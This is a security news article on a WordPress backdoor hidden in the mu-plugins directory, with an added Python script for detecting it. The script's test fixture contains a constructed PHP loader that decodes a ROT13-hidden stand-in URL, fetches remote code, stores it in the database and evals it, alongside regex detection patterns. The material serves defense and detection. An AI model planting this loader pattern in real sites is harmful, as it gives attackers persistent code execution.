Security researchers at Sucuri have identified a backdoor planted in the ‘mu-plugins’ directory of compromised WordPress sites. Because of where it lives, the backdoor gives threat actors persistent access to the site and lets them run arbitrary code on the server while staying out of the plugin list an administrator would normally review.
Must-use plugins, or mu-plugins, are a WordPress feature: any PHP file placed in ‘wp-content/mu-plugins’ is loaded automatically on every request of the site it is installed on, cannot be deactivated from the wp-admin dashboard, and does not appear in the default plugin list (it is shown only under the separate Must-Use view). That combination makes the directory attractive as a persistence location once a site has already been compromised, since the attacker’s code runs on every page load without needing to be activated. The discovered malware uses the mu-plugins directory to store a PHP script named ‘wp-index.php,’ which acts as a loader: it fetches malicious payloads and stores them in the WordPress database, specifically in the wp_options table, so the payload survives even if the loader file is later cleaned up.
Security researcher Puja Srivastava noted that the backdoor also retrieves an obfuscated payload from a remote URL which is stored in the loader ROT13-encoded. ROT13 is a trivial letter substitution, not encryption; its only purpose here is to keep the plain-text domain out of the file so that simple string searches for ‘http’ or a known hostname do not match. Once the payload is obtained, it is executed on the server, giving the attacker code execution and, with it, full control over the site.
The malware creates additional hidden files, including a file manager named ‘pricing-table-3.php’ dropped into the theme directory, which lets the attacker browse, upload, or delete files at will. It also creates an administrator account named ‘officialwp’ and can reset the passwords of existing administrator accounts, effectively locking legitimate users out of their own site.
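The three traits described above (a loader in mu-plugins, a ROT13-hidden URL, and a payload stashed in wp_options, plus the rogue administrator account) are all things a site owner can check for from the filesystem and the database. The script below is an added triage example written for this article; it is not Sucuri’s code and does not reproduce the actual malware. It scans a wp-content tree for must-use plugins that combine a ROT13 decode, a remote fetch, code execution and option persistence, decodes any ROT13 string literals to reveal the hidden URL, flags wp_options rows whose value looks like PHP code, and lists administrator accounts not on an allowlist. The sample loader, option rows, user rows and the option name ‘example_hidden_payload’ are constructed for the demonstration; only ‘wp-index.php’ and ‘officialwp’ come from the report.

```python
"""Triage helper for the mu-plugins loader pattern (added example, not Sucuri's code).

Scans wp-content/mu-plugins for loader-like PHP, decodes ROT13 literals to expose
hidden URLs, flags wp_options values that contain PHP, and lists unexpected admins.
All sample files and rows below are constructed so the script runs offline.
"""
import codecs
import os
import re
import tempfile

# A loader of this kind needs a way to decode its hidden URL, fetch it,
# run the result, and stash it; requiring several of these cuts false positives.
INDICATORS = {
    "rot13": re.compile(r"str_rot13\s*\(", re.I),
    "remote_fetch": re.compile(r"(file_get_contents|curl_init|wp_remote_get)\s*\(", re.I),
    "code_exec": re.compile(r"\b(eval|assert|create_function)\s*\(", re.I),
    "db_persist": re.compile(r"\b(update_option|add_option)\s*\(", re.I),
}
ROT13_LITERAL = re.compile(r"str_rot13\s*\(\s*['\"]([^'\"]+)['\"]\s*\)", re.I)
# Option values are settings; PHP tags or eval'd blobs do not belong there.
PAYLOAD_IN_OPTION = re.compile(r"<\?php|\beval\s*\(|base64_decode\s*\(", re.I)


def decode_rot13_literals(php_source):
    """Return every str_rot13('...') literal in the source, decoded."""
    return [codecs.decode(m, "rot_13") for m in ROT13_LITERAL.findall(php_source)]


def scan_mu_plugins(content_dir):
    """Flag PHP files under wp-content/mu-plugins matching two or more indicators."""
    findings = []
    mu_dir = os.path.join(content_dir, "mu-plugins")
    if not os.path.isdir(mu_dir):
        return findings
    for root, _dirs, files in os.walk(mu_dir):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            hits = sorted(k for k, rx in INDICATORS.items() if rx.search(src))
            if len(hits) >= 2:
                findings.append({
                    "file": os.path.relpath(path, content_dir),
                    "indicators": hits,
                    "decoded_urls": decode_rot13_literals(src),
                })
    return findings


def scan_options(rows):
    """Return option_name values whose option_value looks like stored PHP code."""
    return [r["option_name"] for r in rows if PAYLOAD_IN_OPTION.search(r["option_value"])]


def unexpected_admins(user_rows, known_admins):
    """Return administrator logins that are not on the owner's allowlist."""
    return [u["user_login"] for u in user_rows
            if "administrator" in u["roles"] and u["user_login"] not in known_admins]


# --- constructed sample data (not taken from any real compromise) ---
SAMPLE_LOADER = """<?php
// constructed loader mimicking the pattern: ROT13 URL -> fetch -> store -> run
$u = str_rot13('uggcf://rknzcyr.pbz/cnlybnq.gkg');
$p = file_get_contents($u);
update_option('example_hidden_payload', $p);
eval($p);
"""
SAMPLE_BENIGN = """<?php
// a legitimate must-use plugin: just registers a filter
add_filter('wp_mail_from_name', function () { return 'Example Site'; });
"""
SAMPLE_OPTIONS = [
    {"option_name": "siteurl", "option_value": "https://example.com"},
    {"option_name": "blogname", "option_value": "Example Site"},
    {"option_name": "example_hidden_payload", "option_value": "<?php eval(base64_decode('Wm9v'));"},
]
SAMPLE_USERS = [
    {"user_login": "alice", "roles": ["administrator"]},
    {"user_login": "editor1", "roles": ["editor"]},
    {"user_login": "officialwp", "roles": ["administrator"]},
]


def build_sample_content_dir():
    """Create a throwaway wp-content tree holding the two sample mu-plugins."""
    content_dir = tempfile.mkdtemp(prefix="wp-content-")
    mu_dir = os.path.join(content_dir, "mu-plugins")
    os.makedirs(mu_dir)
    with open(os.path.join(mu_dir, "wp-index.php"), "w") as fh:
        fh.write(SAMPLE_LOADER)
    with open(os.path.join(mu_dir, "site-tweaks.php"), "w") as fh:
        fh.write(SAMPLE_BENIGN)
    return content_dir


if __name__ == "__main__":
    d = build_sample_content_dir()
    for f in scan_mu_plugins(d):
        print(f"{f['file']}: {', '.join(f['indicators'])}; hidden URLs: {f['decoded_urls']}")
    print("options holding PHP:", scan_options(SAMPLE_OPTIONS))
    print("admins not on allowlist:", unexpected_admins(SAMPLE_USERS, {"alice"}))
```

On a real site, point `scan_mu_plugins` at the live wp-content directory and feed `scan_options` and `unexpected_admins` the output of `wp option list` and `wp user list --role=administrator` (or equivalent SQL against wp_options and wp_users/wp_usermeta). The two-indicator threshold is deliberate: legitimate mu-plugins do call update_option or wp_remote_get, but almost none also decode ROT13 and eval the result.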
This ongoing threat poses severe risks to website owners, including data theft and the injection of harmful content aimed at visitors of compromised sites. To reduce exposure, experts recommend that WordPress site administrators keep core, themes and plugins updated, enable two-factor authentication for administrator accounts, and routinely audit their sites, starting with the places this campaign touches: unfamiliar PHP files in ‘wp-content/mu-plugins’ and in the theme directory, wp_options rows whose values contain PHP code, and administrator accounts or password changes that nobody on the team made.